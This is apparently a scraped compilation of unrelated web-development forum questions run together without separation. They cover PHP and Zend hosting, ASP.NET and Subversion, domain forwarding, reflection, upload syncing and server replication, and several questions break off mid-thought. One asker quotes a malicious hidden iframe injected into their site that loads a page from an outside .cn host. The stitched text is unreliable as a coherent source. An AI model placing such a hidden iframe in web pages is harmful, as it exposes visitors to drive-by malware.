  We are using zend framework, doctrine on our website, that will have the minimum of 2000 users daily, please consider that we prefer that the server has opcode caching. And any available technology that speeds up php performance. We have heard that zend server offers an optimal performance for php. Please recommend a hosting server or a vps plan, that can handle such an application. given that our application has some kind of social networking and it applies alot of ajax requests even in minimal usage of the website, for example in 30 min we may have up to 400 requests from an individual user. Why can't I add a ASP.NET website to Subversion like WindowsFormsApplications? How shall i add a ASP.NET website to Subversion repository?

The thing is I contacted db4o support asking if db4o would be suitable for a website, and they answered me that only for websites with low concurrency. That means with few requests? Recently I faced another problem that my website is attacked with the following "iframe" tag. iframe src="http://shopmovielife.cn:8080/index.php" width=127 height=167 style="visibility: hidden" Even if I remove this tag, the index file of website is updated on daily basis.   I've written a website in PHP and it will have ability for users to upload images. My website will have more than 100.000 users. Aprox. 1k users will upload image about 50 KB. And every image will be displayed on this website 5k times so it's transfer of: 1k x 50 KB x 5k = 250 GB per month. So my question is: Do you know any good solution (hosting or CDN network or else) that: will be payed for transfer not space used and no entrance fee will have API to upload images easily with PHP is extremely easy to use will be good for low budget will not require any special, complicated registration and formal things will allow commercial use will allow using this images in website layout ?

• General website publishing questions involving domain forwarding issue

  Even though I have been having a certain level of knowledge and experience about web development I have never interested in obtaining a domain and publishing a website from my own server. Since today I have been struggling with getting my own domain and configuring it utilizing web sources. I started with learning the outline of web publishing process including web server installation, deploying a website for testing purpose,router port forwarding, getting a domain and forwarding domain to my router which will also forward http requests to my web server I am confused about some parts and so far could not get the web site accessed from outside of the network. All I try to do is just for learning purpose so I do not pay much attention to security issues for now. I have Server 2008 and IIS 7.5 installed. I use a laptop and have access to the modem over wireless and my modem is Zoom x6 5590. Well I will continue explaining what I have done so far and what I think will be after each action I did, I have successfully had access to my website on any local computer entering the internal ip address and port pair of the host machine in a browser. Next, I forwarded port 80 of my host machine creating a virtual server like 10.0.0.x(internal ip(static) of the host) - tcp - start port : 80 - end port : 80 in router options. Now I suppose every request that will come to the public Ip on port 80 will be forwarded to my host machine(10.0.0.x) over port 80. So If everyhing went as desired, the website listening on port 80 will accept the request and process the issue and finally respond bla bla bla... I suppose to access my website from outside of the network by entering http://MyPublicIp:80 in a browser but I couldn't accomplish this task by now despite using godady's domain forwarding tool,I see a small view of my website when I click the "preview" button that checks whether the address(http://publicip/Index.aspx) I entered where my domain will be forwarded is available or not. I am sure that configuring domain does not play a role in solving such a problem since using public ip and port matching does not help. So here is the first question, What is the fact that I face this problem? After that, I have couple of question regarding domain forwarding using godaddy tool. Can I forward my domain to a any port for example port 8080 other than default http port 80? Additionally, can I use a sub-domain to forward to a different port of the host? What I want to design is if the client enters www.mydomain.com, website1 will respond over a specified port and after when a client enters info.mydomain.com, another website which listens on different port will respond. I tried to add a sub-domain and forward it to a address like http://www.mydomain.com:8080/Index.aspx with no success. Can I really do that? Finally, what if I have a ftp site listening on the default port 21 and I create a domain like ftp.mydomain.com that will forward to that ftp site address. Is it possible to use sub-domains for ftp site access? I know I am more than confused but no matter whatever and however you reply to me, you will help me have a more clear view on this subject. • How can I load a Class contained in a website from a DLL referenced by that website???

  Ok so this is alittle bit obscure and I'm not sure its the best way of doing what I'm trying to do but here goes. Basically I have a Presentation Layer Dll in my web site which handles the Model View Presenter classes. The presentation layer also handles login for my website and then calls off to a web service. Currently whenever the presentation layer calls to a model it verifies the users details and if they are invalid it calls to a loginHandler which redirects the user to the login page. However I cannot dynamically load a new istance of the Login Page in my website from within my Presentation layer. I've tried to use reflection to dynamically load the class but Since the method call is in the presentation assembly it is only looking within that assembly while the page I want to load is in the website. heres the reflection code that loads the View: public ILoginView LoadView() { string viewName = ConfigurationManager.AppSettings["LoginView"].ToString(); Type type = Type.GetType(viewName, true); object newInstance = Activator.CreateInstance(type); return newInstance as ILoginView; } Anyone got any suggestions on how to search within the website assembly? Ideal I don't want to tie this implementation into the website specifically as the presentation layer is also used in a WPF application.

  I have a website that I regularly update the code to. I keep it in version control. When I want to deploy a new version of the site, I do an export and then symlink the served directory name to the directory of the deployment. There is a place where users can upload files, and I noticed once that, after I had deployed a new version, the user files were gone! Of course, I hadn't added them to the repository, and since the served site was from an export, they weren't uploaded into a version-controlled directory anyways. PHP doesn't yet have integrated svn functionality, so I couldn't do much programmatically to user uploaded files. My solution was to create an additional website, files.website.com, which sits in a parallel directory to the served website, and is served out of a directory that is under version control. That way they don't get obliterated when I do an upgrade to the website. From time to time, I manually add uploaded files to the svn project, deleted user-deleted ones, and commit the new version. I'm working on a shell script to run from cron to do this, but it isn't my forte, so it's on the backburner as it's not a pressing need. Is there a better way to do this?

So I created one MVC application in visual studio and everything is working fine on localhost as a separate application. Now I want to host this MVC app also inside the website I have already deployed. I created a virtual directory(MVCDir) inside the default website in IIS 6.0.   Hello Everybody, I have developed a website using PHP and MYSQL. The website has a commenting system through which registered users of the website can post comments on the feedback posted by different users. When a comment is posted for a feedback an email is sent to the user who posted that feedback notifying him of new comments on his feedback. Now what I want is that a feedback owner should be able to post a new comment in response to that comment by simply replying to the email that has been sent by the website. I have done a php project on LMS with Zend Framework, Everything is in live. When user post contents for a subject that may be size 200K and submitted to the server takes too slow. There are lots of recommendations of books all around, and that's pretty much covered. I'd like to find the sourcecode of a website. Either a well known, well developed open-source website, or a sample sourcecode of a complete website (maybe one used in a book or something). Everyone says they should find the way they learn better.. Well, that's mine.   I have a website using cPanel on a dedicated account, I would like to be able to automatically sync the website to a second hosting company or perhaps to a local (in house ) server. Basically this is a type of replication. The website is database driven (MySQL), so Ideally it would sync everything (content, database, emails etc.) , but most importantly is syncing the website files and its database. I'm not so much looking for a fail-over solution as an automatic replication solution, so if the primary site (Server) goes off-line, I can manually bring up the replicated site quickly. I'm familiar with tools like unison and rsync, but most of these only sync file(s) and do not do too well with open database connections.
